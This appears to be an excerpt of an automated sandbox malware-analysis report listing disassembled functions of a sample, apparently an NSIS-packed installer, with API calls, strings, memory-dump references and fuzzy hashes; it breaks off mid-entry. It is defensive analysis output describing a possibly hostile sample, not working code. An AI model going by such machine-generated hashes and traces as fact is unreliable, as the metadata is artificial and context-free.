Part of subcall function 00405268: lstrlenA.KERNEL32(00402DEC,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
Part of subcall function 00405268: lstrcatA.KERNEL32(00420510,00402DEC,00402DEC,00420510,00000000,00000000,00000000), ref: 004052C4
Part of subcall function 00405268: SetWindowTextA.USER32(00420510,00420510), ref: 004052D6
Part of subcall function 00405268: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
Part of subcall function 00405268: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
Part of subcall function 00405268: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324

CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DFD
ShowWindow.USER32(00000000,00000005), ref: 00402E0B

Part of subcall function 00402D59: MulDiv.KERNEL32(?,00000064,?), ref: 00402D6E

Strings

... %d%%, xrefs: 00402DD3

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 71326f4564a129bc2a25da416bfdb14f43ef231ad407c7c8c263862d40927e90
Instruction ID: b553f58f662a8d3b5c132dd9eb473e82ace801a4c3d7fb7af48dab40205e53c4
Opcode Fuzzy Hash: 71326f4564a129bc2a25da416bfdb14f43ef231ad407c7c8c263862d40927e90
Instruction Fuzzy Hash: EC01C430501624EBCB21AB60EF0CEDE77A8EB80705B04013BF905B51E1DBB848568AED

Function 00404B22 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404B3D
GetMessagePos.USER32 ref: 00404B45
ScreenToClient.USER32(?,?), ref: 00404B5F
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B71
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B97

Strings

f, xrefs: 00404B73

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
Instruction ID: 39453513f114f2a688c797cc76a53a354442de9c6c07e73bdd5afe949bfa8100
Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
Instruction Fuzzy Hash: 1A015E75D00218BAEB00DB94DD85FFEBBBCAF55711F10412BBA50F61D0C7B4A9458BA4

Function 0040646B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406482
wsprintfA.USER32 ref: 004064BB
LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004064CF

Strings

UXTHEME, xrefs: 00406474
%s%s.dll, xrefs: 004064B5
\, xrefs: 00406493

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
Instruction ID: c390764595a0a4e8c5ef638620d3c4371d91d6a13df4ef9e5d2f3a730445ac55
Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
Instruction Fuzzy Hash: 5DF0F63050061A6BDF149B64DD0DFFB365CAF08305F14047AAA86E20C1EABCD9258B5D

Function 00402CDD Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
wsprintfA.USER32 ref: 00402D2C
SetWindowTextA.USER32(?,?), ref: 00402D3C
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D4E

Strings

verifying installer: %d%%, xrefs: 00402D21, 00402D2A
unpacking data: %d%%, xrefs: 00402D1A

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: c25539744540cbbb9a571437eca3a60936911fc1bfeb79ef91e14ebf2a0af94a
Instruction ID: d8b1f7c19252c76547d0ac26773f92b51ee34845b2b999cc677ac46ee6bff0cf
Opcode Fuzzy Hash: c25539744540cbbb9a571437eca3a60936911fc1bfeb79ef91e14ebf2a0af94a
Instruction Fuzzy Hash: 75F01D7150020DABEF206F50DE1ABAE3669EB04345F00803AFA06B51D0DBB89D568B99

Function 004027A3 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
GlobalFree.KERNEL32(?), ref: 0040284C
GlobalFree.KERNEL32(00000000), ref: 0040285F
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 96695c404a829781fd9be7667be0c963bc8871e5b1670740abd5a7ef253750dd
Instruction ID: 81d5057223690197c1e699a61141c161be386b669f751160d25d8bfdf59f5f06
Opcode Fuzzy Hash: 96695c404a829781fd9be7667be0c963bc8871e5b1670740abd5a7ef253750dd
Instruction Fuzzy Hash: 17214A72C00224ABDF217FA58D49DAE7F79EF05364B10823AF520762E1CB7949428F98

Function 00404A18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00420D30,00420D30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404933,000000DF,00000000,00000400,?), ref: 00404AB6
wsprintfA.USER32 ref: 00404ABE
SetDlgItemTextA.USER32(?,00420D30), ref: 00404AD1

Strings

%u.%u%s%s, xrefs: 00404AA0
0B, xrefs: 00404AA8

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$0B
API String ID: 3540041739-2032437577
Opcode ID: 773d23f090e8bb878499c5f5a9f1f4fae98b1c8909eb46a18e62ff3655c09282
Instruction ID: 283b724f563733faa375caf007583819479a8bdae971eeac84f96503b42fc0b0
Opcode Fuzzy Hash: 773d23f090e8bb878499c5f5a9f1f4fae98b1c8909eb46a18e62ff3655c09282
Instruction Fuzzy Hash: B311E777A0412437DB0065B99C42EAF329CDB85334F250237FA26F61D1E9788C1286AC

Function 004063AB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,0042A000,74DF3410,0042B400,00000000,0040335F,0042B400,0042B400,00403596,?,00000006,00000008,0000000A), ref: 00406403
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406410
CharNextA.USER32(?,0042A000,74DF3410,0042B400,00000000,0040335F,0042B400,0042B400,00403596,?,00000006,00000008,0000000A), ref: 00406415
CharPrevA.USER32(?,?,74DF3410,0042B400,00000000,0040335F,0042B400,0042B400,00403596,?,00000006,00000008,0000000A), ref: 00406425

Strings

*?|<>/":, xrefs: 004063F3

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 42c4a3e1a2d6554428903665c9d613c7fc86cd3241a92e9ce5ad7ed014b00af2
Instruction ID: a9374e22e98c4dc303b182c9b737662c14652e6601d1bee761dd9fa1fda1dddb
Opcode Fuzzy Hash: 42c4a3e1a2d6554428903665c9d613c7fc86cd3241a92e9ce5ad7ed014b00af2
Instruction Fuzzy Hash: CF1104618047A129EB3206281C44BB77FD84F57760F19507BE9C6722C2C67C5C6687AD

Function 00401759 Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(00000000,00000000,0040A400,0042A800,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,0040A400,0040A400,00000000,00000000,0040A400,0042A800,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00406141: lstrcpynA.KERNEL32(?,?,00000400,00403456,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040614E

Part of subcall function 00405268: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
Part of subcall function 00405268: lstrlenA.KERNEL32(00402DEC,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
Part of subcall function 00405268: lstrcatA.KERNEL32(00420510,00402DEC,00402DEC,00420510,00000000,00000000,00000000), ref: 004052C4
Part of subcall function 00405268: SetWindowTextA.USER32(00420510,00420510), ref: 004052D6
Part of subcall function 00405268: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
Part of subcall function 00405268: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
Part of subcall function 00405268: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: e46fcd66ca0c03b620896b40c4a0e1f2dfe6120aced77b5f2cefcd60ba1a1a55
Instruction ID: 0d7b692f0969cc6c48ecd1773d7bef120b43cce909374c5328822aabc6167b55
Opcode Fuzzy Hash: e46fcd66ca0c03b620896b40c4a0e1f2dfe6120aced77b5f2cefcd60ba1a1a55
Instruction Fuzzy Hash: 5041EA31904514BACF107FB5CC85DAF3675DF01368B21823BF422F11E2D67C8A518A6D

Function 00401D41 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D58
GetClientRect.USER32(?,?), ref: 00401D9F
LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
DeleteObject.GDI32(00000000), ref: 00401DF4

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 6d361dd0a7bd119e4dcf8cd95c58e489de1fba3b0937df668af2218f6ab52cb8
Instruction ID: 4e2990ac6a4ffc21ac5b981bdbb81ef568083f955646f0f466aa61fc58f6164b
Opcode Fuzzy Hash: 6d361dd0a7bd119e4dcf8cd95c58e489de1fba3b0937df668af2218f6ab52cb8
Instruction Fuzzy Hash: E5215172E00109AFDB05DF98DE44AEEBBB9FB48300F11413AF955F62A1CB789941CB58

Function 00401DFF Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E02
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
ReleaseDC.USER32(?,00000000), ref: 00401E35
CreateFontIndirectA.GDI32(0040B800), ref: 00401E84

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ecc7f293e71b6e620ba012bcc34b05138f32b7cee601414cb4789f3f20b24dfb
Instruction ID: 0be634766171be457783ff79a9756eb1f19897d62519dac9fb9e1121949108d1
Opcode Fuzzy Hash: ecc7f293e71b6e620ba012bcc34b05138f32b7cee601414cb4789f3f20b24dfb
Instruction Fuzzy Hash: E0015672505244AFE7016B70AE49B9A3FFCEB55305F148839F141BA2F3C7B405058BAD

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: da175abb4f003f4507e1b1c7c2270da77c9b2dc8e44ccc016535c95a43b1b010
Instruction ID: 4dd2caf9872ce2c472bdea934ff98caf8c51944457e5ccf01e556c8d58d08a81
Opcode Fuzzy Hash: da175abb4f003f4507e1b1c7c2270da77c9b2dc8e44ccc016535c95a43b1b010
Instruction Fuzzy Hash: DF216BB1944208BEEF06AFA4D98AAAD7FB5EF84304F10457EF501B61D1C7B88640DB18

Function 0040206A Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00402095

Part of subcall function 00405268: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
Part of subcall function 00405268: lstrlenA.KERNEL32(00402DEC,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
Part of subcall function 00405268: lstrcatA.KERNEL32(00420510,00402DEC,00402DEC,00420510,00000000,00000000,00000000), ref: 004052C4
Part of subcall function 00405268: SetWindowTextA.USER32(00420510,00420510), ref: 004052D6
Part of subcall function 00405268: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
Part of subcall function 00405268: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
Part of subcall function 00405268: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020A5
GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040211F

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: df5d644a59522aa61f3373e64faaf985ebd9509900b3279fcc19072475c480c0
Instruction ID: 80b21b969d6ebc687a9b8df38f4f0a36329d2626e066ad813a30d40d344f2c23
Opcode Fuzzy Hash: df5d644a59522aa61f3373e64faaf985ebd9509900b3279fcc19072475c480c0
Instruction Fuzzy Hash: D7210B31900214ABCF117FA4CF8DA9D75B4AF05318F61413BF511B62D0C7FC8942961E

Function 00402C2E Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: cba0278263bc03600708203fc435bba4fcda38ed50437662e6a3aa3c8f338271
Instruction ID: 8b1a66862eed69ce562a1c013b09e470fd8cd67d05fd9df1f25174a21af08f5a
Opcode Fuzzy Hash: cba0278263bc03600708203fc435bba4fcda38ed50437662e6a3aa3c8f338271
Instruction Fuzzy Hash: 9E115832504109BBEF129F90DF09B9E7B6DEB54340F204036B945B61E0E7B59E15AA68

Function 0040572E Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,?,0042B400), ref: 00405771
GetLastError.KERNEL32 ref: 00405785
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040579A
GetLastError.KERNEL32 ref: 004057A4

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: b2e40bd14cc28a37ac1f323aea01ae50661d499ebe80bd917bbe6229fb226c26
Instruction ID: d10382b71f01f386bba03ee380318ec3e3b09e45dfe00312e2f61c9024105f83
Opcode Fuzzy Hash: b2e40bd14cc28a37ac1f323aea01ae50661d499ebe80bd917bbe6229fb226c26
Instruction Fuzzy Hash: 82010471D10619EADF109FA4DA04BEFBBB8EF14314F00403AD945B6290E77896088FA9

Function 00405BC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406141: lstrcpynA.KERNEL32(?,?,00000400,00403456,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040614E

Part of subcall function 00405B72: CharNextA.USER32(?,?,00422138,?,00405BDE,00422138,00422138,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0,00000000), ref: 00405B80
Part of subcall function 00405B72: CharNextA.USER32(00000000), ref: 00405B85
Part of subcall function 00405B72: CharNextA.USER32(00000000), ref: 00405B99

lstrlenA.KERNEL32(00422138,00000000,00422138,00422138,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0,00000000), ref: 00405C1A
GetFileAttributesA.KERNEL32(00422138,00422138,00422138,00422138,00422138,00422138,00000000,00422138,00422138,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0), ref: 00405C2A

Strings

8!B, xrefs: 00405BCD

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 8!B
API String ID: 3248276644-3245627493
Opcode ID: f11ffb2f425415d306e3ff92d605dce437d15ba0656bf276e283064df69d2d98
Instruction ID: f44c27dbebaf7467ddcf3faaec1fa70c7ffebf3acca808db2791febee6a049cb
Opcode Fuzzy Hash: f11ffb2f425415d306e3ff92d605dce437d15ba0656bf276e283064df69d2d98
Instruction Fuzzy Hash: 04F02D3510CE5016DA22333A1C06AAF6654CE8332871D013BFC52752D2CB3CA4529D7D

Function 004051DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040520B
CallWindowProcA.USER32(?,?,?,?), ref: 0040525C

Part of subcall function 0040421B: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040422D

Strings

, xrefs: 004051EC

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: af1a6eb119da9e6e0b56ac6574a67ba8a9aef1628151bf47205cde5aebdf2d5f
Instruction ID: ea2b2a229446d05cd35f1ac4721927dc1f932898565a27d058a062da5ba1ec36
Opcode Fuzzy Hash: af1a6eb119da9e6e0b56ac6574a67ba8a9aef1628151bf47205cde5aebdf2d5f
Instruction Fuzzy Hash: 8E017131200608ABEF215F51ED84A5B3A6AFF84354F54447BFA00762E1C739AC529E5A

Function 00405D09 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405D1D
GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405D37

Strings

nsa, xrefs: 00405D14

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
Instruction ID: d70fdf4684184e9e49a6c992afbb8c38346e2f0ad7ed1da82a4e26761949b0bc
